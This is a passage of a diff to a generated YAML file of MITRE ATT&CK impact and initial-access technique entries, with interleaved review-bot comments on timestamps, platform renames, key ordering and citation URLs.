+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
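Review bot: the `spec_version: '2.1'` line is removed from T1496 and T1565.002 in this hunk (and from every technique further down) with nothing added in its place; if any consumer treats these `technique:` blocks as STIX 2.1 objects, `spec_version` is a required common property there, so the commit message should state that the drop is a deliberate generator change and that downstream index builders were checked against it. Two smaller points in the same hunk: the new `Sysdig Cryptojacking Proxyjacking 2023` description carries a stray space before the period in `Targeting GitLab .`, which is copied from the upstream citation text and is better fixed upstream than by hand here; and the whole T1565.002 block is deleted and re-added in a different key order (`modified`/`name` first, `type`/`id`/`created` near the end) when only `modified`, `x_mitre_attack_spec_version` and the FireEye APT38 URL actually change, so emitting keys in a stable sorted order from the generator would shrink this to the three real changes.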
@@ -59686,7 +60624,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -59712,9 +60650,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
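Review bot: the data source added to T1485 is `Cloud Storage: Cloud Storage Modification`, while the description change in the previous hunk is about deleting cloud storage objects; a deletion component would be the tighter match for that text, so confirm this line was taken from the upstream object for version 1.3 rather than hand-edited, since everything else in this file is generated.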
@@ -59770,55 +60709,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -59833,6 +60728,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -59845,16 +60744,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
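Review bot: the rebuilt T1498 platform list drops `Azure AD`, `Office 365`, `Google Workspace` and `SaaS` without substituting anything, whereas the other platform rewrites in this patch (T1566.002, T1078.001, T1199) replace the retired names with `Identity Provider` and `Office Suite`; dropping `SaaS` in particular narrows the technique's scope, so check the list against the upstream 1.2 object before merging in case this is a merge artifact. The FSISAC reference in the same hunk changes both the URL and the retrieval date (September 23, 2024), which is the right way to record a re-fetched citation.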
@@ -59922,11 +60857,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -59944,7 +60878,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -59971,7 +60905,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -60021,13 +60955,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
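Review bot: the `disable_notif_synology_ransom` citation is repointed from `twitter.com` to `x.com` with a fresh 2024 retrieval date, but the target is a single tweet and can disappear at any time; since the same patch uses a `web.archive.org` capture for the ACSC PDF, giving this reference the same treatment would make it durable.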
@@ -60095,11 +61028,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
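Review bot: `modified` for T1529 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-03-22T20:45:22.531Z`, and the same happens for T1133 (`2023-05-09` to `2023-03-30`) and T1195.003 (`2022-05-24` to `2022-04-28`) later in the patch; every old value shares the `14:00:00.188Z` suffix, which reads as a release-wide stamp rather than a per-object edit time, so the new values are probably the real ones, but any tooling that compares `modified` to decide whether a technique needs regenerating will see these as rollbacks. Say so in the commit message, or note that the old stamps were placeholders.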
@@ -60164,13 +61096,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -60248,7 +61179,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -60298,11 +61228,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -60341,10 +61270,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
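Review bot: replacing `Office 365` and `Google Workspace` with `Identity Provider` and `Office Suite` on T1566.002 changes the keys the per-platform index files are generated from; any index named after a retired platform will silently lose this technique, so the platform-to-index mapping in the generator needs the new names added, and a decision on whether the old per-platform indexes are kept, renamed or emptied, in the same change.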
@@ -60361,7 +61290,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
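Review bot: the ACSC SPF reference now points at a `web.archive.org` capture dated 2021-07-08 but still says `Retrieved October 19, 2020`, so the recorded retrieval predates the snapshot being cited; the FSISAC entry earlier in this patch updates the date together with the URL, and the same should happen here and in the identical T1566.001 hunk below.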
@@ -60400,12 +61329,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -60467,7 +61395,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -60484,7 +61412,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -60514,7 +61441,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -60528,7 +61455,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -60591,12 +61517,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -60671,7 +61596,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -60685,19 +61610,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -60723,7 +61647,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -60778,7 +61702,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -60841,11 +61764,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -60860,6 +61782,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
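Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted between `kill_chain_phases` and `x_mitre_deprecated` for T1078.001, while for T1498 and T1565.002 in this same patch it is emitted at the end of the object after `object_marking_refs`; the key order is being copied from upstream rather than normalised, which is why this object needs three hunks to express a platform rename and a version bump. Sorting keys in the generator would give every technique diff the same shape.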
@@ -60868,18 +61791,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -60911,14 +61834,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -60929,6 +61849,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -60937,22 +61862,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -60977,36 +61898,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
